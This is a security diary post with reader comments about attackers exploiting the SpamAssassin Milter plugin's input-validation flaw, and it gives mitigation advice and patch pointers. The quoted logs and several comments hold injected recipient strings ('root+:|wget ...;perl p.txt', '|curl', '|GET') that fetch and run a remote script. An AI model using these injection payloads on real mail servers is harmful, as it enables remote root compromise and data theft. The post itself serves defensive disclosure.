Spamassassin Milter Plugin Remote Root Attack

Published: 2010-03-15
Last Updated: 2011-01-30 04:34:25 UTC
by Adrien de Beaupre (Version: 2)
4 comment(s)

Observant reader Roy caught an interesting exploit attempt against his SMTP server. His review of the logs turned up this:

Messages rejected to recipient: root+:|wget
       hxxp://;perl p.txt:[] : User unknown in local recipient
       table; from=<> to=<root+:|wget
       hxxp:// : 1 Time(s)

Handler Bojan notes that it appears that the bad guys have started to actively exploit SpamAssassin's milter vulnerability that has been published last weekend (more details at

The perl script collects some information about the local host and tries to send it to on port 80 -- this host appears to be unreachable at the moment though.

Update: SecurityFocus BID 38578

Mitigation: There is a preliminary patch available at the SpamAssassin Milter Plugin project site, bug #29136: SpamAssassin Milter Plugin Input Validation Flaw Lets Remote Users Execute Arbitrary Code:

Alternatively, don't use the -x option when running this plugin, as well do not run it as root.

Adrien de Beaupré Inc.


4 comment(s)


On FreeBSD, a fix hasn't yet made it into ports. Is there any mitigation against this attack aside from disabling spamass-milter for the time being?
I'm using spamass-milter on CentOS 5.x (a.k.a. Red Hat Enterprise Linux). Fortunately, the RPM as distributed by Red Hat doesn't use the "-x" flag. *whew* Just check your /etc/sysconfig/spamass-milter EXTRA_FLAGS to see if you added it yourself.

To double-check I attempted the exploit described at the Full Disclosure link (above) and it didn't work.
I havve logged attempts to use curl as well.

rcpt to: root+:"|wget"

rcpt to: root+:"|wget"
rcpt to: root+:"|GET"
rcpt to: root+:"|curl"
@BillBixby: The preliminary patch linked to in the article applies nicely within the port. Just copy it to ${PORTSDIR}/mail/spamass-milter/files/patch-popen and force a rebuild and reinstall of spamass-milter. Tested here on a couple of MTAs (8R-p2 base Sendmail).

Diary Archives